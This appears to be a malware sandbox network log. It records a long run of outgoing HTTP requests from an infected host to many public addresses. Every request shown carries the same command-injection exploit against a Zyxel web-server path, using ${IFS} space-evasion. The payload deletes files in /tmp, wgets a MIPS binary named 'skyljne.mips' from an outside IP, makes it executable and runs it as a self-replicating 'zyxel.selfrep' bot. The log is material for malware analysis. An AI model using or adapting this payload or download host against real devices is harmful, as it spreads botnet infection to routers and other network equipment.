                                                Jan 12, 2024 18:16:10.143157959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1117192.168.2.23569049.109.179.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143199921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1118192.168.2.2342394101.14.52.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143232107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1119192.168.2.2351588173.129.225.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143276930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1120192.168.2.2347668124.51.79.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143320084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1121192.168.2.235961874.74.148.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143363953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1122192.168.2.2340576194.217.254.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143399000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1123192.168.2.233998668.220.203.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143428087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1124192.168.2.2355870155.251.6.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143486977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1125192.168.2.234397278.217.84.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143538952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1126192.168.2.2354436104.125.27.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143563986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1127192.168.2.233452844.205.203.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143601894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1128192.168.2.2339546157.108.157.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143656015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1129192.168.2.2346580176.52.178.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143728018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1130192.168.2.234677614.161.250.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143752098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1131192.168.2.23525705.108.58.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143811941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1132192.168.2.2352688188.217.90.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143838882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1133192.168.2.233436012.5.231.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143881083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1134192.168.2.2346726195.73.15.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143918037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1135192.168.2.2357994223.118.81.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143954039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1136192.168.2.235558235.98.27.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.143982887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1137192.168.2.234292273.85.57.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144025087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1138192.168.2.2335924208.126.26.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144040108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1139192.168.2.233539499.206.98.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144078016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1140192.168.2.2345382173.120.224.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144098997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1141192.168.2.2350746133.166.89.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144133091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1142192.168.2.2338288205.2.132.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144176006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1143192.168.2.2343004165.4.42.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144215107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1144192.168.2.2360684144.25.205.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144248009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1145192.168.2.234656687.145.253.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144288063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1146192.168.2.2338792204.207.118.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144335985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1147192.168.2.234694088.161.208.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144385099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1148192.168.2.2334000169.123.210.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144408941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1149192.168.2.2335002136.115.33.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144440889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1150192.168.2.2346012124.242.121.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144488096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1151192.168.2.233704291.157.203.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144515991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1152192.168.2.233895017.27.101.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144563913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1153192.168.2.2333048209.34.155.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144602060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1154192.168.2.2340196203.197.248.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144644022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1155192.168.2.2342378161.106.30.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144691944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1156192.168.2.2337398160.129.163.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144722939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1157192.168.2.235190668.132.98.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144776106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1158192.168.2.2349856219.204.190.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144815922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1159192.168.2.233957432.226.73.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144865036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1160192.168.2.2359760143.108.249.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144912004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1161192.168.2.233881648.58.61.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144934893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1162192.168.2.2356436178.211.202.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.144992113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1163192.168.2.234937694.69.210.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145041943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1164192.168.2.2351952163.96.174.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145081997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1165192.168.2.235483818.251.199.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145121098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1166192.168.2.234441090.143.202.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145157099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1167192.168.2.2337118147.39.251.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145203114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1168192.168.2.234801492.181.28.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145240068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1169192.168.2.233942875.221.164.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145282984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1170192.168.2.2355152179.116.174.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145307064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1171192.168.2.2358530195.140.50.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145354033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1172192.168.2.2339588203.73.67.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145385981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1173192.168.2.2352528210.8.78.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145421028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1174192.168.2.235924080.119.224.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145443916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1175192.168.2.2355112199.129.81.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145498037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1176192.168.2.2355188144.84.254.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145545006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1177192.168.2.2351330108.74.5.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145579100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1178192.168.2.234041662.159.204.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145603895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1179192.168.2.236051614.80.194.246443
                                                TimestampBytes transferredDirectionData
